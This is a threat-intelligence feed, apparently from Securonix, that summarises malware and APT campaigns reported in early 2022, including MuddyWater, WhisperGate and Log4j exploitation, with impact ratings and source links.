Summary:: Researchers at Cisco Talos has observed a new campaign targeting Turkish private organizations alongside governmental institutions. They have attributes this campaign with high confidence to MuddyWater which utilizes malicious PDFs XLS files and Windows executables to deploy malicious PowerShell-based downloaders acting as initial footholds.

Source: http://blog.talosintelligence.com/2022/01/iranian-apt-muddywater-targets-turkey.html

Intel Source:: STR

Intel Name:: WhisperGate Lateral Movement_Seeder Queries_02/02/2022

Date of Scan:: 2022-02-03

Impact:: HIGH

Summary:: This research is part of Securonix Threat Labs - Threat Research Team

Source: STR Repository

Intel Source:: CrowdStrike

Intel Name:: StellarParticle campaign by CozyBear/APT29

Date of Scan:: 2022-02-02

Impact:: HIGH

Summary:: Researchers at Crowdstrike has tracked activities of the StellatPraticle campaign and its association with the COZY BEAR adversary group. They have also disccussed about the Tactics and Techniques leveraged in StellarPraticle few of the techniques are - Credential hopping use of TrailBlazer implant and Linux variant of GoldMax malware etc.

Source: https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/

Intel Source:: AT&T

Intel Name:: BotenaGo Malware

Date of Scan:: 2022-02-02

Impact:: MEDIUM

Summary:: BotenaGo malware source code is now available to any malicious hacker or malware developer. With only 2 891 lines of code BotenaGo has the potential to be the starting point for many new variants and new malware families using its source code. Alien Labs expects to see new campaigns based on BotenaGo variants targeting routers and IoT devices globally.

Source: https://cybersecurity.att.com/blogs/labs-research/botenago-strike-again-malware-source-code-uploaded-to-github

Intel Source:: Symantec

Intel Name:: ShuckWorm targets Ukraine

Date of Scan:: 2022-02-02

Impact:: MEDIUM

Summary:: Symenatec researchers cam through a cyber espionage campaign targetting Ukraine. This campaign was attributed a famous threat actor group called Shuckworm which is allegedly a state sponsored threat group from Russia.

Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espionage-ukraine

Intel Source:: Malwarebytes

Intel Name:: Lazarus APT

Date of Scan:: 2022-02-02

Impact:: HIGH

Summary:: This attack including a clever use of Windows Update to execute the malicious payload and GitHub as a command and control server by North Korean APT.

Source: https://blog.malwarebytes.com/threat-intelligence/2022/01/north-koreas-lazarus-apt-leverages-windows-update-client-github-in-latest-campaign/

Intel Source:: Federal Office_German Government

Intel Name:: APT 27 targetting German Companies

Date of Scan:: 2022-02-01

Impact:: LOW

Summary:: German government informed about a Chinese cyberespionage campaign who have been targetting german companies by exploiting vulnerabilities in Microsoft exchange and ZOHO Self service. In this campaign HyperBro malware was used.

Source: https://www.verfassungsschutz.de/SharedDocs/publikationen/DE/cyberabwehr/2022-01-bfv-cyber-brief.pdf?__blob=publicationFile&v=10 https://therecord.media/german-government-warns-of-apt27-activity-targeting-local-companies/

Intel Source:: Curated Intel

Intel Name:: Belarusian Cyber-Partisans group attack national railways

Date of Scan:: 2022-02-01

Impact:: LOW

Summary:: Belarusian hacktivist group aka Belarusian Cyber-Partisans claimed responsibility for a limited attack against the national railway company. A primary objective of the attack they claimed was aimed at hindering Russian troop movements inside Belarus. Initial access via BlueKeep RCE (CVE-2019-0708) in RDP in a Windows Server 2008 R2 system. Used the 3proxy[.]ru service to launch attacks from a VPS. Use of Mimikatz to dump LSASS etc..

Source: https://www.curatedintel.org/2022/01/hacktivist-group-shares-details-related.html

Intel Source:: Cyfirma

Intel Name:: WaspLocker Ransomware

Date of Scan:: 2022-02-01

Impact:: LOW

Summary:: WaspLocker is a ransomware which encrypts files on your system with AES+RSA encryption and append the encrypted files with .0.locked extension and put them in a folder with extension .locked. It spreads via phishing spear phishing and social engineering tactics.

Source: https://www.cyfirma.com/outofband/ransomware-report-wasplocker/

Intel Source:: Internal

Intel Name:: Log4j 4 IP's

Date of Scan:: 2022-01-31

Impact:: HIGH

Summary:: IP address linked to Log4j vulnerability

Source: Internal Investigations

Intel Source:: Blackberry

Intel Name:: Prophet Spider exploiting Log4j Vulnerability

Date of Scan:: 2022-01-31

Impact:: HIGH

Summary:: Blackberry Research team have discovered an correlating attack by Prophet Spider group with exploitation of Log4j vulnerability in VMware Horizon. Researchers also claimed to have spotted Propjer Spider TTPs as sell network access to other criminals including ransomware gangs. Despite VMware's patch and subsequent guidance many implementations remain unpatched leaving them susceptible to exploitation.

Source: https://blogs.blackberry.com/en/2022/01/log4u-shell4me

Intel Source:: MalwareBytes

Intel Name:: KONNI RAT

Date of Scan:: 2022-01-31

Impact:: HIGH

Summary:: KONNI is a Remote Administration Tool that has being used for at least 8 years. The North Korean threat actor that is using this piece of malware has being identified under the Kimsuky umbrella. KONNI Rat is being actively developed and new samples are now including significant updates.

Source: https://blog.malwarebytes.com/threat-intelligence/2022/01/konni-evolves-into-stealthier-rat/

Intel Source:: Avast

Intel Name:: Chaes Banking Trojan

Date of Scan:: 2022-01-31

Impact:: HIGH

Summary:: Researchers from Avast discovered that Chaes banking Trojan has been actively spreading since November 2020. Chaes is its multi-stage distribution method which makes use of programming frameworks such as JScript Python and NodeJS binary files written in Delphi as well as malicious Google Chrome extensions among other things.

Source: https://decoded.avast.io/anhho/chasing-chaes-kill-chain/

Intel Source:: Sophos

Intel Name:: Midas Ransomware

Date of Scan:: 2022-01-28

Impact:: MEDIUM

Summary:: An attack on technology vendor was identified and the ransomware behind it was Midas. Midas Ransomware Attack Highlights the Risks of Limited Access Controls and “Ghost” Tools. The attackers were able to spend nearly two months undetected in a target's environment.

Source: https://news.sophos.com/en-us/2022/01/25/windows-services-lay-the-groundwork-for-a-midas-ransomware-attack/ https://github.com/sophoslabs/IoCs/blob/master/Ransomware-Midas.csv

Intel Source:: Team Cymru

Intel Name:: Analysis of a Management IP Address linked to Molerats APT

Date of Scan:: 2022-01-28

Impact:: MEDIUM

Summary:: Team Cymru have analysed management of IP addresses which were linked to Molerats APT. These were higher order infrastructure utilizing IP addresses assigned to Palestinian providers. Additionally the targets identified were Israel and Saudi Arabia.

Source: https://team-cymru.com/blog/2022/01/26/analysis-of-a-management-ip-address-linked-to-molerats-apt/

Intel Source:: Morphisec

Intel Name:: AsyncRAT

Date of Scan:: 2022-01-28

Impact:: MEDIUM

Summary:: Morphisec researchers have identified a new sophisticated campaign delivery evading multiple AVs. Through a simple email phishing tactic with an html attachment threat attackers are delivering AsyncRAT (a remote access trojan) designed to remotely monitor and control its infected computers through a secure encrypted connection.

Source: https://blog.morphisec.com/asyncrat-new-delivery-technique-new-threat-campaign

Intel Source:: WeLiveSecurity

Intel Name:: DazzleSpy macOS malware

Date of Scan:: 2022-01-27

Impact:: MEDIUM

Summary:: ESET rersearchers discovered a new watering hole attack targeting macOS users and visitors of a pro-democracy radio station website in Hong Kong and infecting them with the DazzleSpy malware.

Source: https://www.welivesecurity.com/2022/01/25/watering-hole-deploys-new-macos-malware-dazzlespy-asia/

Intel Source:: Cofense

Intel Name:: TrickBot Invoices

Date of Scan:: 2022-01-27

Impact:: HIGH

Summary:: In the new campaign TrickBot is taking advantage of supply chain delays and sending the phishing emails to users with an invoice attachment claiming to be from USPS. This TrickBot campaign demonstrates more effort than past campaigns relative to design and more in the email itself. Most of the time the style for TrickBot campaign emails is relatively simple and can be easily spotted as suspicious.

Source: https://cofense.com/blog/trickbot-malware-delivered-as-invoicess

Intel Source:: STR

Intel Name:: PKEXEC LPE/CVE-2021-4034_Seeder Queries

Date of Scan:: 2022-01-26

Impact:: MEDIUM

Summary:: This research is part of Securonix Threat Labs - Threat Research Team

Source: STR Repository

Intel Source:: STR

Intel Name:: WhisperGate TTP_Seeder Queries

Date of Scan:: 2022-01-26

Impact:: HIGH

Summary:: This research is part of Securonix Threat Labs - Threat Research Team

Source: STR Repository

Intel Source:: IBM

Intel Name:: Trickbot's new evasion technique

Date of Scan:: 2022-01-25

Impact:: HIGH

Summary:: As per securityintelligence researchers TrickBot operators have been escalating activity. As part of that escalation malware injections have been fitted with added protection to keep researchers out and get through security controls.

Source: https://securityintelligence.com/posts/trickbot-bolsters-layered-defenses-prevent-injection/

Intel Source:: QI-ANXIN Threat Intelligence Center

Intel Name:: OceanLotus APT attack

Date of Scan:: 2022-01-25

Impact:: HIGH

Summary:: The state-sponsored threat actor group known as OceanLotus is using the web archive file format to evade system detection while delivering backdoors for intrusion. A report from QI-ANXIN Threat Intelligence Center claims that OceanLotus’s campaign is actively using web archive files (.MHT and .MHTML) for its attacks.

Source: https://mp.weixin.qq.com/s/1L7o1C-aGlMBAXzHqR9udA

Intel Source:: Netskope

Intel Name:: Infected PowerPoint Files Using Cloud Services to Deliver Multiple Malware

Date of Scan:: 2022-01-25

Impact:: MEDIUM

Summary:: Researchers at Netspoke has identified an increase in the usage of one specific file type from the Microsoft Office suite: PowerPoint. These relatively small files are being delivered through phishing emails then downloading and executing malicious scripts through LoLBins a common technique often used to stay under the radar.

Source: https://www.netskope.com/blog/infected-powerpoint-files-using-cloud-services-to-deliver-multiple-malware

Intel Source:: Trend Micro

Intel Name:: APT36/Earth Karkaddan

Date of Scan:: 2022-01-25

Impact:: HIGH

Summary:: According to Trend Micro researchers the suspected Pakistani threat actor group APT36 aka Earth Karkaddan has expanded its malware arsenal by adding a new Android Rat malware -CapraRAT.

Source: https://www.trendmicro.com/en_us/research/22/a/investigating-apt36-or-earth-karkaddans-attack-chain-and-malware.html

Intel Source:: Fortinet

Intel Name:: STRRAT Malware

Date of Scan:: 2022-01-25

Impact:: MEDIUM

Summary:: Researchers at Fortinet has identified an email which was subsequently found to harbor a variant of the STRRAT malware as an attachment. STRRAT is a multi-capability Remote Access Trojan that dates to at least mid-2020. Unusually it is Java-based and is typically delivered via phishing email to victims.

Source: https://www.fortinet.com/blog/threat-research/new-strrat-rat-phishing-campaign

Intel Source:: Cleafy Labs

Intel Name:: BRATA RAT malware

Date of Scan:: 2022-01-25

Impact:: MEDIUM

Summary:: Researchers from Cleafy have tracked BRATA malware and have documented its evolution in terms of both new targets and new features.

Source: https://www.cleafy.com/cleafy-labs/how-brata-is-monitoring-your-bank-account

Intel Source:: Proofpoint

Intel Name:: DTPacker

Date of Scan:: 2022-01-24

Impact:: MEDIUM

Summary:: Researchers at Proofoint has identified a malware packer which researchers have dubbed as 'DTPacker'. The malware is typically used to pack remote access trojans that can be used to steal information and load follow-on payloads such as ransomware.

Source: https://www.proofpoint.com/us/blog/threat-insight/dtpacker-net-packer-curious-password-1

Intel Source:: STR

Intel Name:: MoonBounce Implant_Seeder Queries

Date of Scan:: 2022-01-24

Impact:: HIGH

Summary:: This research is part of Securonix Threat Labs - Threat Research Team

Source: STR Repository

Intel Source:: Zscaler

Intel Name:: Molerats APT Espionage campaign

Date of Scan:: 2022-01-24

Impact:: HIGH

Summary:: Zscaler ThreatLabz team have detected several samples of macro-based MS office files uploaded from Middle Eastern countries. These files contained decoy themes related to geo-political conflicts between Israel and Palestine. Such themes have been used in previous attack campaigns waged by the Molerats APT.

Source: https://www.zscaler.com/blogs/security-research/new-espionage-attack-molerats-apt-targeting-users-middle-east

Intel Source:: Gemini Advisory

Intel Name:: FIN7 trojanized USB

Date of Scan:: 2022-01-24

Impact:: HIGH

Summary:: Geminiadvisory researchers found FIN7 group using flash drives to Spread Remote Access Trojan. It uses the trojanized USB devices to ultimately load the IceBot Remote Access Trojan (RAT) resulting in FIN7 gaining unauthorized remote access to systems within victims’ networks.

Source: https://geminiadvisory.io/fin7-flash-drives-spread-remote-access-trojan/

Intel Source:: ASEC

Intel Name:: DDoS IRC Bot Malware

Date of Scan:: 2022-01-24

Impact:: LOW

Summary:: ASEC Research Team has discovered that DDoS IRC Bot strains disguised as adult games are being installed via webhards. Webhards are platforms commonly used for the distribution of malware in Korea where njRAT and UDP Rat were distributed in the past.

Source: https://asec.ahnlab.com/en/30755/

Intel Source:: Trend Micro

Intel Name:: Emotet Spam

Date of Scan:: 2022-01-24

Impact:: HIGH

Summary:: Trend Micro research team spotted the new ransomware family named 'White Rabbit' which discretely making a name for itself by executing an attack on a local US bank in December 2021. The ransomware copies the hiding capability from Egregor and carries a potential connection to the APT group FIN8.

Source: https://www.trendmicro.com/en_us/research/22/a/emotet-spam-abuses-unconventional-ip-address-formats-spread-malware.html

Intel Source:: STR

Intel Name:: AIKIDO C2_Seeder Queries - 24/01/2022

Date of Scan:: 2022-01-24

Impact:: HIGH

Summary:: This research is part of Securonix Threat Labs - Threat Research Team

Source: STR Repository

Intel Source:: WeLiveSecurity

Intel Name:: DONOT Hacking team/APT-C-35/SectorE02

Date of Scan:: 2022-01-21

Impact:: MEDIUM

Summary:: ESET researchers take a deep look into recent attacks carried out by Donot Team throughout 2020 and 2021 targeting government and military entities in several South Asian countries.

Source: https://www.welivesecurity.com/2022/01/18/donot-go-do-not-respawn/

Intel Source:: BitDefender

Intel Name:: BHUNT Stealer

Date of Scan:: 2022-01-21

Impact:: MEDIUM

Summary:: Bitdefender researchers have discovered a new family of crypto-wallet stealer malware dubbed as 'BHUNT'. The samples identified appear to have been digitally signed with a digital certificate issued to a software company but the digital certificate does not match the binaries.

Source: https://www.bitdefender.com/files/News/CaseStudies/study/411/Bitdefender-PR-Whitepaper-CyberWallet-creat5874-en-EN.pdf

Intel Source:: INKY

Intel Name:: DoL Phishing

Date of Scan:: 2022-01-21

Impact:: MEDIUM

Summary:: Researchers at INKY has detected phishing campaign that impersonated the United States Department of Labor (DoL). In this campaign the majority of phishing attempts had sender email addresses spoofed to look as if they came from no-reply@dol[.]gov which is the real DoL site. A small subset was spoofed to look as if they came from no-reply@dol[.]com which is of course not the real DoL domain.

Source: https://www.inky.com/blog/fresh-phish-phishers-lure-victims-with-fake-invites-to-bid-on-nonexistent-federal-projects

Intel Source:: Akamai

Intel Name:: Mirai Botnet Abusing Log4j

Date of Scan:: 2022-01-21

Impact:: HIGH

Summary:: Researchers at Akamai has examined a ARM binary which revealed the adaptation of Log4j vulnerability to infect and assist in the proliferation of malware used by the Mirai botnet.

Source: https://www.akamai.com/blog/security/mirai-botnet-abusing-log4j-vulnerability

Intel Source:: Kaspersky

Intel Name:: MoonBounce

Date of Scan:: 2022-01-20

Impact:: HIGH

Summary:: Kaspersky Researchers has identified a UEFI firmware-level compromise which Researchers further analysed and detected that a single component within the inspected firmware’s image was modified by attackers in a way that allowed them to intercept the original execution flow of the machine’s boot sequence and introduce a sophisticated infection chain.

Source: https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/

Intel Source:: Microsoft

Intel Name:: WhisperGate

Date of Scan:: 2022-01-20

Impact:: HIGH

Summary:: MSTIC found a destructive malware operation which have been targeting organaizations in UKraine. The malware has been dubbed as WhisperGate. The activity has been identified as possible Master Boot Records (MBR) Wiper activity.

Source: https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/ https://twitter.com/threatintel/status/1483470646210445320

Intel Source:: Elastic

Intel Name:: Operation Bleeding Bear

Date of Scan:: 2022-01-20

Impact:: HIGH

Summary:: Researchers at Elastic Security provides new analysis and insights into targeted campaign against Ukraine organizations with destructive malware. In a multi-staged attack one malware component known as WhisperGate utilizes a wiping capability on the Master Boot Record (MBR) making any machine impacted inoperable after boot-up.

Source: https://elastic.github.io/security-research/malware/2022/01/01.operation-bleeding-bear/article/#indicators

Intel Source:: Trend Micro

Intel Name:: White Rabbit Ransomware

Date of Scan:: 2022-01-20

Impact:: MEDIUM

Summary:: Trend Micro research team spotted the new ransomware family named 'White Rabbit' which discretely making a name for itself by executing an attack on a local US bank in December 2021. The ransomware copies the hiding capability from Egregor and carries a potential connection to the APT group FIN8.

Source: https://lodestone.com/insight/white-rabbit-ransomware-and-the-f5-backdoor/ https://www.trendmicro.com/en_us/research/22/a/new-ransomware-spotted-white-rabbit-and-its-evasion-tactics.html

Intel Source:: SentinelOne

Intel Name:: Blackcat Ransomware

Date of Scan:: 2022-01-20

Impact:: MEDIUM

Summary:: Researchers at SentinelOne analysing BlackCat Ransomware behaviour. BlackCat first appeared in late November 2021 and has reportedly been attacking targets in multiple countries including Australia India and the U.S and demanding ransoms in the region of $400 000 to $3 000 000 in Bitcoin or Monero.

Source: https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/

Intel Source:: Kaspersky

Intel Name:: Targeted ICS Spyware

Date of Scan:: 2022-01-20

Impact:: MEDIUM

Summary:: Kaspersky ICS Experts have noticed a large set of campaigns that spread from one industrial enterprise to another via hard-to-detect phishing emails disguised as the victim organizations’ correspondence and abusing their corporate email systems to attack through the contact lists of compromised mailboxes.

Source: https://ics-cert.kaspersky.com/publications/reports/2022/1/19/campaigns-abusing-corporate-trusted-infrastructure-hunt-for-corporate-credentials-on-ics-networks/

Intel Source:: STR

Intel Name:: SysJoker_Seeder Queries - 12/01/2022

Date of Scan:: 2022-01-19

Impact:: HIGH

Summary:: This research is part of Securonix Threat Labs - Threat Research Team

Source: STR Repository

Intel Source:: Bushidotoken

Intel Name:: (Mailbox Phishing Kit)Espionage campaign- Renewable energy companies

Date of Scan:: 2022-01-19

Impact:: MEDIUM

Summary:: A security researcher discovered a large-scale cyber-espionage campaign targeting primarily renewable energy and industrial technology organization. The attacker uses a custom 'Mail Box' toolkit an unsophisticated phishing package deployed on the actors' infrastructure as well as legitimate websites compromised to host phishing pages.

Source: https://blog.bushidotoken.net/2022/01/tracking-renewable-energy-intelligence.html https://www.bleepingcomputer.com/news/security/cyber-espionage-campaign-targets-renewable-energy-companies/

Intel Source:: STR

Intel Name:: AIKIDO C2_Seeder Queries - 18/01/2022

Date of Scan:: 2022-01-19

Impact:: MEDIUM

Summary:: This research is part of Securonix Threat Labs - Threat Research Team

Source: STR Repository

Intel Source:: STR

Intel Name:: AIKIDO ICEID New Delivery Method_Seeder Queries - 12/01/2022

Date of Scan:: 2022-01-19

Impact:: MEDIUM

Summary:: This research is part of Securonix Threat Labs - Threat Research Team

Source: STR Repository

Intel Source:: Uptycs

Intel Name:: vSphere cryptominer campaign

Date of Scan:: 2022-01-19

Impact:: MEDIUM

Summary:: Researchers from Uptycs identified some malicious shell scripts which specifically targets VMware vSphere. The attackers have used certain commands in the shell script to modify the vSphere service in order to run the Xmrig miner.

Source: https://www.uptycs.com/blog/cryptominer-campaign-targeting-vmware-vsphere-services-for-coin-mining

Intel Source:: STR

Intel Name:: MuddyWater_MOIS_Seeder Queries - 14/01/2022

Date of Scan:: 2022-01-18

Impact:: HIGH

Summary:: This research is part of Securonix Threat Labs - Threat Research Team

Source: STR Repository

Intel Source:: Kaspersky

Intel Name:: BlueNoroff APT Group

Date of Scan:: 2022-01-14

Impact:: HIGH

Summary:: The North Korea-linked APT group BlueNoroff has been spotted targeting cryptocurrency startups with fake MetaMask browser extensions. The latest attacks targeted cryptocurrency startups in the US Russia China India the UK Ukraine Poland Czech Republic UAE Singapore Estonia Vietnam Malta Germany and Hong Kong.

Source: https://securelist.com/the-bluenoroff-cryptocurrency-hunt-is-still-on/105488/

Intel Source:: US cyber command

Intel Name:: MuddyWater_MOIS

Date of Scan:: 2022-01-13

Impact:: HIGH

Summary:: U.S. Cyber Command’s Cyber National Mission Force (CNMF) has identified multiple open-source tools used by an Iranian advanced persistent threat (APT) group known as MuddyWater. The techniques used by the APT group includes side-loading DLLs in order to trick legitimate programs into running malware and obfuscating PowerShell scripts to hide command and control functions.

Source: https://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-open-source-tools/

Intel Source:: Microsoft

Intel Name:: DEV-0401

Date of Scan:: 2022-01-13

Impact:: MEDIUM

Summary:: Microsoft Threat Intelligence Center has detected an activity from attackers where they started exploiting the CVE-2021-44228 vulnerability in internet-facing systems running VMware Horizon. These attacks are performed by a China-based ransomware operator that they tracking as DEV-0401.

Source: https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/#NightSky

Intel Source:: CrowdStrike

Intel Name:: TellYouThePass Ransomware

Date of Scan:: 2022-01-13

Impact:: HIGH

Summary:: Crowdstrike found re-emerged version of TellYouThePass ransomware compiled using golang. The same ransomware was recently associated with Log4Shell post-exploitation targeting Windows and Linux.

Source: https://www.crowdstrike.com/blog/tellyouthepass-ransomware-analysis-reveals-modern-reinterpretation-using-golang/

Intel Source:: Avast

Intel Name:: Exploit Kits vs Chrome

Date of Scan:: 2022-01-13

Impact:: MEDIUM

Summary:: Avast researchers found Underminer exploit kit developed an exploit for the Chromium based vulnerability.There were two exploit kits that dared to attack Google Chrome: Magnitude using CVE-2021-21224 and CVE-2021-31956 and Underminer using CVE-2021-21224 CVE-2019-0808 CVE-2020-1020 and CVE-2020-1054.

Source: https://decoded.avast.io/janvojtesek/exploit-kits-vs-google-chrome/

Intel Source:: eSentire

Intel Name:: GootLoader Campaign

Date of Scan:: 2022-01-13

Impact:: MEDIUM

Summary:: Esentire researchers found that Operators of the GootLoader campaign are targeting employees of accounting and law firms. GootLoader is a stealthy initial access malware which after getting a foothold into the victim's computer system infects the system with ransomware or other lethal malware.

Source: https://www.esentire.com/security-advisories/gootloader-hackers-are-compromising-employees-of-law-firms-and-accounting-agencies-warns-esentire

Intel Source:: ASEC

Intel Name:: Magniber Ransomware

Date of Scan:: 2022-01-13

Impact:: MEDIUM

Summary:: Analysts from ahnlab discovered that attackers behind the Magniber ransomware who have been exploiting IE-based vulnerabilities so far are now targeting PCs via modern browsers such as Edge and Chrome.

Source: https://asec.ahnlab.com/en/30645/

Intel Source:: Netskope

Intel Name:: Abusing MS Office Using Malicious Web Archive Files

Date of Scan:: 2022-01-13

Impact:: MEDIUM

Summary:: The OceanLotus group of state-sponsored hackers are now using the web archive file format (.MHT and .MHTML) to deploy backdoors to compromised systems.

Source: https://www.netskope.com/blog/abusing-microsoft-office-using-malicious-web-archive-files

Intel Source:: Fortinet

Intel Name:: RedLine Stealer

Date of Scan:: 2022-01-12

Impact:: MEDIUM

Summary:: Researchers at Fortinet has identified an executable file 'Omicron Stats.exe' which attributed to be a variant of RedLine Stealer malware. Researchers has analysed Redline new variant its core functions how it communicates with its C2 server and how organizations can protect themselves.

Source: https://www.fortinet.com/blog/threat-research/omicron-variant-lure-used-to-distribute-redline-stealer

Intel Source:: STR

Intel Name:: STR Omega 1/12/22

Date of Scan:: 2022-01-12

Impact:: HIGH

Summary:: This research is part of Securonix Threat Labs - Threat Research Team

Source: STR Repository

Intel Source:: Cisco Talos

Intel Name:: Nanocore Netwire and AsyncRAT

Date of Scan:: 2022-01-12

Impact:: HIGH

Summary:: Cisco Talos researchers discovered new attacks Campaign Using Public Cloud Infrastructure to Spread RATs those RATs are Nanocore Netwire and AsyncRATs.

Source: https://blog.talosintelligence.com/2022/01/nanocore-netwire-and-asyncrat-spreading.html

Intel Source:: MalwareBytes

Intel Name:: Patchwork APT

Date of Scan:: 2022-01-12

Impact:: LOW

Summary:: MalwareBytes labs has analysed a campaign where Patchwork APT has used malicious RTF files to drop a variant of the BADNEWS Remote Administration Trojan (RAT).

Source: https://blog.malwarebytes.com/threat-intelligence/2022/01/patchwork-apt-caught-in-its-own-web/

Intel Source:: Cado security

Intel Name:: ABCbot

Date of Scan:: 2022-01-12

Impact:: LOW

Summary:: Cadosecurity researchers analyzed Abcbot and found its link with Xanthe based cryptojcaking campaign. Same threat actor is responsible for both Xanthe and Abcbot and is shifting its objective from mining cryptocurrency on compromised hosts to activities more traditionally associated with botnets such as DDoS attacks.

Source: https://www.cadosecurity.com/abcbot-an-evolution-of-xanthe/

Intel Source:: Checkpoint

Intel Name:: APT35

Date of Scan:: 2022-01-11

Impact:: HIGH

Summary:: CheckPoint researchers discovered that APT35 have started widespread scanning and attempts to leverage Log4j flaw in publicly facing systems.

Source: https://research.checkpoint.com/2022/apt35-exploits-log4j-vulnerability-to-distribute-new-modular-powershell-toolkit/

Intel Source:: Intezer

Intel Name:: SysJoker Backdoor

Date of Scan:: 2022-01-11

Impact:: HIGH

Summary:: Researchers from Intezer discovered a new ulti-platform backdoor that targets Windows Mac and Linux. The backdoor was named as SysJoker. SysJoker masquerades as a system update and generates its C2 by decoding a string retrieved from a text file hosted on Google Drive.

Source: https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/

Intel Source:: STR

Intel Name:: Trojanized dnspy app campaign

Date of Scan:: 2022-01-11

Impact:: HIGH

Summary:: This research is part of Securonix Threat Labs - Threat Research Team

Source: STR Repository

Intel Source:: STR

Intel Name:: VMware Horizon Exploitation Using Log4J

Date of Scan:: 2022-01-11

Impact:: HIGH

Summary:: This research is part of Securonix Threat Labs - Threat Research Team

Source: STR Repository

Intel Source:: Palo Alto

Intel Name:: TA551 IcedID

Date of Scan:: 2022-01-06

Impact:: MEDIUM

Summary:: Palo Alto Unit42 Researchers has tracked TA551 activity where threat actor using Word documents with both German templates and Italian templates. Later deliverying IcedID malware.

Source: https://github.com/pan-unit42/tweets/blob/master/2022-01-05-IOCs-for-TA551-IcedID-with-Cobalt-Strike.txt

Intel Source:: Palo Alto

Intel Name:: Web Skimmer Campaign

Date of Scan:: 2022-01-06

Impact:: MEDIUM

Summary:: Researchers at Unit42 has found a supply chain attack leveraging a cloud video platform to distribute skimmer (aka formjacking) campaigns. In skimmer attacks cybercriminals inject malicious JavaScript code to hack a website and take over the functionality of the site’s HTML form page to collect sensitive user information.

Source: https://unit42.paloaltonetworks.com/web-skimmer-video-distribution/

Securonix EON: A New Era of AI–Reinforced CyberOps

Securonix EON: A New Era of AI–Reinforced CyberOps

Securonix EON: A New Era of AI–Reinforced CyberOps

Securonix EON: A New Era of AI–Reinforced CyberOps

Threat Research Feed